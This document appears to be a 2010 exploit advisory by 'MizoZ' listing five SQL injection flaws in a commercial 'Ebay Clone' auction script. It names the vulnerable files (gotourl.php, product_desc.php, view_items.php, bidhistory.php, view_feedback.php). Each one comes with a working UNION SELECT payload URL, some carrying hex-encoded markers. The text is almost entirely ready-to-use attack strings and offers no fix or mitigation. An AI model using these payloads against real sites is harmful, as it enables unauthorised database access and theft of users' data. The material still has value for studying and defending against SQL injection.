1 /*
2
3 Name : Ebay Clone from (clone2009.com<http://clone2009.com>)
4 Site : http://www.clone2009.com/
5
6 Author : Hamza ’MizoZ’ N.
7 Email : mizozx[at]gmail[dot]com
8
9 Greetz : Zuka , GreyMen :)
10
11 */
12
13 # 1st SQL injection :
14
15 File : gotourl.php , Get : id
16
17 [HOST]/[PATH]/gotourl.php?id=−1+union+select+version()−−
18
19 => You will be redirected to [HOST]/[PATH]/[VERSION]
20
21 Demo : http://server/gotourl.php?id=0+union+select+version()−−
22
23 # 2nd SQL Injection :
24
25 File : product_desc.php , Get : id
26
27 [HOST]/[PATH]/product_desc.php?id=[INJECTION]
28
29 Demo : http://server/product_desc.php?id=−35+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
,24,25,26,27,28,29,30,31,32,33,34,35−−
30
31 # 3th SQL Injection :
32
33 File : view_items.php , Get : id
34
35 [HOST]/[PATH]/view_items.php?id=[INJECTION]
36
37 Demo : http://server/view_items.php?id=−62+union+select+1,2,3,4,5,6,7,8,9,10,0x3c666f6e7420636f6c6f723d22726564223e48
45524520494e4a454354494f4e3c2f666f6e743e,12,13,14,15,16,17,18−−
38
39 # 4th SQL Injection :
40
41 File : bidhistory.php , Get : id
42
43 [HOST]/[PATH]/bidhistory.php?id=[INJECTION]
44
45 Demo : http://server/bidhistory.php?id=−45+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2
4,25,26,27,28,29,30,31,32,33,34−−
46
47 # 5th SQL Injection :
48
49 FIle : view_feedback.php , Get : id
Page 1/2
Ebay Clone from clone2009 SQL Injection Vulnerabilities
Hamza ’MizoZ’ N.
01/16/2010
50
51 [HOST]/[PATH]/view_feedback.php?id=[INJECTION]
52
53 Demo : http://server/view_feedback.php?id=−62+union+select+1,2,3,4,5,6,7,8,9,10,0x3c68313e484552453c2f68313e,12,13,14
,15,16,17,18−−
54
Page 2/2
Ebay Clone from clone2009 SQL Injection Vulnerabilities
Hamza ’MizoZ’ N.
01/16/2010